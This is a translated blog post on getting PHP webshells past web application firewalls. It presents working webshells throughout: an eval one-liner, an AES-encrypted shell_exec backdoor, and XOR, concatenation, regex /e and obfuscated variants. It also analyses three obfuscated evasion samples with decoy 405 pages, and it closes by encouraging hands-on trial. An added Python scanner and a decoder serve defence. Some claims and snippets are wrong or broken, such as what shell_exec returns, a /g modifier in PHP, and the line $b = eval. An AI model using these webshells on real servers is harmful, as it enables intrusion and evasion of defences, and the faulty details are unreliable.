0x00 Preface
During earlier HW engagements I ran into WAFs many times. At first I simply asked a more experienced colleague for a few evasion-ready webshell samples to get past them, but as this kept happening I started, half deliberately, to study the evasion techniques themselves. This article is a brief analysis of webshell evasion, written mainly to consolidate what I have learned.
0x01 Principle
The principle behind WAF evasion is simply to use encoding and encryption to slip past the WAF's rules: with enough techniques, most WAFs can be bypassed. Conversely, with enough rules, a WAF can stop most webshells.

Take a PHP one-line webshell as an example:
```php
<?php eval($_POST['cmd']); ?>
```
The code passes the cmd parameter straight into eval. Obviously eval has long been under strict WAF scrutiny, so what can be done about this function?
1. Function substitution
Back then WAF rules were not yet complete, and PHP has several other functions that execute commands, such as shell_exec, system, assert, passthru and exec:

- system: executes a command and returns the result
- shell_exec: executes a command and does not return the result
- assert: usually called an assertion, but it can execute code; note that after PHP 7.1 assert no longer has this code-execution capability
These functions can stand in for eval, but in this day and age I believe every one of them is monitored by WAFs to some degree. The one still in common use is system, because it may legitimately appear in many modules and is therefore not watched as strictly.
2. Concatenation
This exploits a PHP characteristic that is fatal for keyword filtering: strings can be joined with the `.` operator, so `echo $a.$b` prints `ab`. The same method can assemble a sensitive function name piece by piece:

's'.'y'.'s'.'t'.'e'.'m'
Other languages can concatenate with the + operator instead.

Concatenation can then be combined with the $_POST or $_GET parameter handling:
```php
$a = $_POST['cmd'];
$b = eval;   // sketch from the original post; eval is a language construct, not a callable function name
$b($a);
```
3. XOR

XOR means using the xor operation as the encryption function: the payload is XOR-ed with a key to encrypt it, and XOR-ing the result with the same key restores it.
```php
$key = "sadwa21s21lm1";
$encoded = $input ^ $key;   // XOR the payload with the key
eval($encoded ^ $key);      // XOR again with the same key to recover and run it
```
4. AES encryption

This method is still quite effective against modern WAFs: thanks to the ECB and CBC cipher modes and a randomly generated key, it gets past most WAFs at the static-analysis level.
```php
<?php
// Key and IV are the author's placeholder values; AES-256-CBC expects a 32-byte key and a 16-byte IV
$key = 'secretkey';
$iv = 'iviviv';

function encrypt($data, $key, $iv) {
    return openssl_encrypt($data, 'AES-256-CBC', $key, 0, $iv);
}

function decrypt($data, $key, $iv) {
    return openssl_decrypt($data, 'AES-256-CBC', $key, 0, $iv);
}

if (isset($_POST['cmd'])) {
    $encryptedCmd = $_POST['cmd'];
    $decryptedCmd = decrypt($encryptedCmd, $key, $iv);
    if ($decryptedCmd) {
        $output = shell_exec($decryptedCmd);
        echo encrypt($output, $key, $iv);   // the response is encrypted as well
    } else {
        echo 'Decryption failed';
    }
} else {
    echo 'No command received';
}
?>
```
5. String replacement

PHP has a replace function, str_replace: you can write in a deliberately wrong string and then replace it with the name of the command-execution function.
```php
$a = test($_POST['cmd']);
str_replace("e" . "val", "test", $a);
```
One more function deserves special mention: preg_replace, whose /e modifier executes the replacement as code.
```php
// the /e modifier evaluates the replacement string as PHP; it was removed in PHP 7.0
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
```
A few important points about the preg_replace modifiers:
1. /g means the expression finds all possible matches in the input string and may return several results; without /g at most one match is found.
2. /i makes matching case-insensitive, the same as in other languages' regex dialects.
3. /m enables multi-line matching, i.e. potential matches on either side of a newline; it affects the ^ and $ anchors.
4. /s is the counterpart of /m: single-line mode.
5. /e is the executable mode, a PHP-specific flag used for example with preg_replace.
6. /x ignores whitespace in the pattern.
\1 is a back-reference. Wrapping a regex pattern or part of a pattern in parentheses causes the corresponding match to be stored in a temporary buffer; each captured sub-match is stored in the order in which it appears in the pattern from left to right. Buffers are numbered from 1 and up to 99 captured sub-expressions can be stored. Each buffer can be accessed as '\n', where n is a one- or two-digit decimal number identifying the buffer. Here it is \1, so it refers to the first capture.
Extension

If the WAF has blocked preg_replace, two other functions can be used: mb_ereg_replace and mb_eregi_replace. They are used the same way, both executing code via the e option.
6. Encoding bypass

base64, rot13, base32, unicode and URL encoding are all worth trying.
7. Code obfuscation

Again taking PHP as the example: this style of obfuscation has been around for many years, but it is worth revisiting.
```php
$OOO0O0O00=__FILE__;
// urldecode() yields 'th6sbehqla4co_sadfpnr'; the character offsets below spell out base64_decode
$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');
$OO00O0000=7088;
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};                              // "base"
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};                          // "64_d"
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};             // "ecode"
$O0O0000O0='OOO0000O0';   // the {n} string-offset syntax used here was removed in PHP 8
```
Does this kind of code make your head spin? It is strange yet familiar: in reality it is just PHP's dynamic-variable feature plus base64 encoding plus confusingly named custom variables.
```php
$O00OO0000 = 'assert';
$O0O0OOO0 = 'system';
$O0O00O0O = 'shell_exec';
$O00OO0000("echo 'Hello'");   // calls assert through the variable
$O0O0OOO0("ls");              // calls system through the variable
```
Or this variant:
```php
<?php
$O0O0O = "e"."v"."al";
$O0O0O(base64_decode('c3lzdGVtKCdscycpOw=='));   // the base64 decodes to system('ls');
?>
```
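A detection-side counterpart to the techniques in this section, added here as an example (not code from the original post): a small Python heuristic scanner that flags PHP source showing the patterns described above. The rule names, weights and sample strings are this example's own choices, and the samples are built from this section's snippets.

```python
import re

# Each rule: (name, weight, regex). The names and weights are this example's own.
RULES = [
    # 's'.'y'.'s'.'t'.'e'.'m' or "e"."v"."al": a name assembled from char literals
    ("char_concat", 3, re.compile(r"""(?:['"]\w['"]\s*\.\s*)+['"]\w+['"]""")),
    # $$key / $$filename: variable-variables hiding which variable holds the code
    ("variable_variable", 3, re.compile(r"\$\$\w+")),
    # $b($a), $O00OO0000("..."): a function called through a variable
    ("variable_function", 2, re.compile(r"\$\w+\s*\(")),
    # eval/assert fed straight from a decoder or cipher routine
    ("eval_of_decode", 4, re.compile(
        r"\b(?:eval|assert)\s*\(\s*@?(?:base64_decode|openssl_decrypt|str_rot13|gzinflate)\s*\(", re.I)),
    # eval/assert of a variable, which also covers the plain one-liner
    ("eval_of_variable", 2, re.compile(r"\b(?:eval|assert)\s*\(\s*\$", re.I)),
    # mb_ereg_replace / mb_eregi_replace with an 'e' in the option string
    ("mb_ereg_e", 4, re.compile(r"""mb_eregi?_replace\s*\(.*?,\s*['"][a-z]*e[a-z]*['"]\s*\)""", re.I | re.S)),
    # $OOO0O0O00-style look-alike identifiers
    ("lookalike_ident", 2, re.compile(r"\$[O0]{5,}\b")),
]
PREG_FIRST_ARG = re.compile(r"""preg_replace\s*\(\s*(['"])(.*?)\1""", re.S)
PREG_E_WEIGHT = 4

def preg_replace_e_count(source):
    """Count preg_replace calls whose pattern string carries the e modifier."""
    hits = 0
    for _quote, pattern in PREG_FIRST_ARG.findall(source):
        if not pattern:
            continue
        closing = {"(": ")", "{": "}", "[": "]", "<": ">"}.get(pattern[0], pattern[0])
        end = pattern.rfind(closing)
        if end > 0 and "e" in pattern[end + 1:]:
            hits += 1
    return hits

def scan(source):
    """Return {rule_name: hit_count} for every rule that fires on the PHP source."""
    hits = {name: len(rx.findall(source)) for name, _w, rx in RULES}
    hits["preg_replace_e"] = preg_replace_e_count(source)
    return {name: n for name, n in hits.items() if n}

def score(source):
    """Weighted sum of hits; a few points or more deserves a manual look."""
    weights = {name: w for name, w, _rx in RULES}
    weights["preg_replace_e"] = PREG_E_WEIGHT
    return sum(weights[name] * n for name, n in scan(source).items())

# Constructed samples built from the snippets in this section, plus a benign one.
SAMPLES = {
    "one_liner": "<?php eval($_POST['cmd']); ?>",
    "concat": '<?php $O0O0O = "e"."v"."al"; $O0O0O(base64_decode(\'c3lzdGVtKCdscycpOw==\')); ?>',
    "preg_e": r'''echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);''',
    "benign": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:10s} score={score(src):2d} {scan(src)}")
```

The rules are deliberately loose (variable function calls also appear in legitimate callback code), so treat the score as a triage signal to be confirmed by reading the file.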
0x02 Case analysis
Let us pick a few evasion samples and briefly analyze the techniques inside them, taking XG拟态 as the example.

1. AES + base64
```php
<?php
class cFile {
    private function selectFile($filename){
        $sign = 'fff6cdb9613532a1';
        $fileurl = 'F4Ig+uOe6m94xRsp1jE3v3+NTr5ynQj/qVoBWQuKci0=';
        $file = openssl_decrypt(cFile::de($fileurl), "AES-128-ECB", $sign, OPENSSL_PKCS1_PADDING);
        $file_error = $$filename;   // variable-variable: reads $file, the decrypted code
        @eval($file_error);
        return "filename";
    }
    public function getPriv() {
        return $this->selectFile(...);
    }
    public static function de($file){
        return base64_decode($file);
    }
}
$cfile = new cFile;
$error = $cfile->getPriv();
$error('file');
$VMf0hX = "...";   // base64-encoded decoy 405 page (omitted in this listing)
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
    header('Content-Type:text/html;charset=utf-8');
    http_response_code(405);
    echo base64_decode($VMf0hX);
}
```
Here the file contents were AES-encrypted beforehand, and the code decrypts them at run time:
```php
private function selectFile($filename){
    $sign = 'fff6cdb9613532a1';
    $fileurl = 'F4Ig+uOe6m94xRsp1jE3v3+NTr5ynQj/qVoBWQuKci0=';
    $file = openssl_decrypt(cFile::de($fileurl), "AES-128-ECB", $sign, OPENSSL_PKCS1_PADDING);
    $file_error = $$filename;
    @eval($file_error);
    return "filename";
}
public function getPriv() {
    return $this->selectFile(...);
}
public static function de($file){
    return base64_decode($file);
}
```
2. Dynamic concatenation + replacement + base64
```php
<?php
$password='WlhaZYLWcbSbaGJDZ2ZYLWcbSbtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ==';
$username = get_meta_tags(__FILE__)[$_GET['token']];
header("ddddddd:".$username);
$arr = apache_response_headers();
$template_source='';
foreach ($arr as $k => $v) {
    if ($k[0] == 'd' && $k[5] == 'd') {
        $template_source = str_replace($v,'',$password);
    }
}
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
$aes_decode[1]=$$key;
@eval($aes_decode[1]);
$jWLTwO = "...";   // base64-encoded decoy 405 page (omitted in this listing)
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
    header('Content-Type:text/html;charset=utf-8');
    http_response_code(405);
    echo base64_decode($jWLTwO);
}
```
Approach:

A name and a content value are first written into the code as a comment (meta tags). get_meta_tags looks them up, and a token parameter is passed in: when token equals the name, the lookup yields the content, which is stored in username and added to a response header.

The script then searches the response headers for the one whose name is ddddddd, removes every occurrence of that content from password (replacing it with the empty string), and assigns the result to template_source:
WlhaZYLWcbSbaGJDZ2ZYLWcbSbtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ== => WlhaaGJDZ2ZYLtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ==
```php
$key = 'template_source';
$aes_decode[1]=$$key;   // variable-variable: $$key is $template_source
@eval($aes_decode[1]);
```
On the surface this looks like an AES decryption routine, but it is really a misleadingly named custom variable; what finally executes is the content taken from the comment.

3. base64 + dynamic concatenation + replacement + nested file read
```php
<?php
header('Serve:'.base64_encode(__FILE__));
$password='WlhaaGvTLtwRENJvTLtwRENDZ2tYMvTLtwRENUJQVTFSYkoyTnRaQ2RkS1RzPQ==';
ob_start();
if($_GET['file']){
    $a = base64_decode($_GET['file']);
}else{
    $a = 'application.xml';
}
readfile($a);
$file = ob_get_contents();
ob_end_clean();
$username = substr($file,8,8);
$template_source = str_replace($username,'',$password);
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
if(@$_GET['file']){
    $aes_decode[1]=$$key;
}else{
    $aes_decode[1]='echo \'\';';
}
@eval($aes_decode[1]);
$VEIUrP = "...";   // base64-encoded decoy 405 page (omitted in this listing)
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
    header('Content-Type:text/html;charset=utf-8');
    http_response_code(405);
    echo base64_decode($VEIUrP);
}
```
The file is base64-encoded and placed in the Serve response header, and a file parameter is then supplied, for example QzpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXDEyMy5waHA=, which base64-decodes to C:\phpStudy\PHPTutorial\WWW\123.php. In practice this serves no purpose; it is code meant to distract.
```php
header('Serve:'.base64_encode(__FILE__));
$password='WlhaaGvTLtwRENJvTLtwRENDZ2tYMvTLtwRENUJQVTFSYkoyTnRaQ2RkS1RzPQ==';
ob_start();
if($_GET['file']){
    $a = base64_decode($_GET['file']);
}else{
    $a = 'application.xml';
}
readfile($a);
$file = ob_get_contents();
ob_end_clean();
```
Once the parameter is supplied, the script reads the entire file at the decoded path. Because that content was inserted into the Serve header earlier, the first line is:
```php
$username = substr($file,8,8);   // eight bytes starting at offset 8 of the file just read
$template_source = str_replace($username,'',$password);
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
if(@$_GET['file']){
    $aes_decode[1]=$$key;
}else{
    $aes_decode[1]='echo \'\';';
}
@eval($aes_decode[1]);
```
Here the substring slicing actually cuts into the comment content as well; what is left after slicing is vTLtwREN, which becomes the username and is used to replace that token inside password. Two base64 decodes plus the misleadingly named custom variable then achieve command execution.
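For incident responders who find one of these files, the decoding chain from samples 2 and 3 above (strip a junk token from $password, then base64-decode twice) can be replayed offline to see what the script would have passed to eval without running it. This is an added example, not code from the post or from XG拟态; the $password strings are copied from the listings above, while the file header for sample 3 is a constructed assumption based on the analysis that substr($file, 8, 8) lands inside a comment.

```python
import base64
import binascii

# $password strings copied from the sample-2 and sample-3 listings above.
SAMPLE2_PASSWORD = "WlhaZYLWcbSbaGJDZ2ZYLWcbSbtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ=="
SAMPLE3_PASSWORD = "WlhaaGvTLtwRENJvTLtwRENDZ2tYMvTLtwRENUJQVTFSYkoyTnRaQ2RkS1RzPQ=="
# Constructed stand-in for the head of the sample-3 file (an assumption): the
# analysis says substr($file, 8, 8) lands on a comment, so a '<?php /*...*/'
# header is assumed with the junk token right after the 8-byte '<?php /*'.
SAMPLE3_FILE_HEAD = "<?php /*vTLtwREN*/ header('Serve:'.base64_encode(__FILE__));"


def recover_payload(password, junk):
    """Mirror of the PHP chain: str_replace($junk, '', $password), then
    base64_decode twice. Raises binascii.Error when the junk token is wrong."""
    stripped = password.replace(junk, "")
    once = base64.b64decode(stripped, validate=True)
    return base64.b64decode(once, validate=True).decode("ascii")


def username_from_file(content):
    """Sample 3's $username = substr($file, 8, 8)."""
    return content[8:16]


def find_junk(password, min_len=4, max_len=16):
    """Recover the junk token when it is not at hand (meta tag or comment
    stripped): try every repeated substring and keep the one whose removal
    double-decodes to printable text. Returns None if none does."""
    for length in range(min_len, max_len + 1):
        for start in range(len(password) - length + 1):
            token = password[start:start + length]
            if password.count(token) < 2:
                continue
            try:
                text = recover_payload(password, token)
            except (binascii.Error, UnicodeDecodeError):
                continue
            if text.isprintable():
                return token
    return None


if __name__ == "__main__":
    print("sample 2:", recover_payload(SAMPLE2_PASSWORD, find_junk(SAMPLE2_PASSWORD)))
    user = username_from_file(SAMPLE3_FILE_HEAD)
    print("sample 3:", user, "->", recover_payload(SAMPLE3_PASSWORD, user))
```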
0x03 Summary

Where there is attack there is defence, and evasion techniques can never be exhausted. The above lists only a handful of evasion methods; there are many more to explore on your own. This field relies mostly on clever ideas and bold hands-on practice, and only by trying methods one by one can you learn which ones suit you best.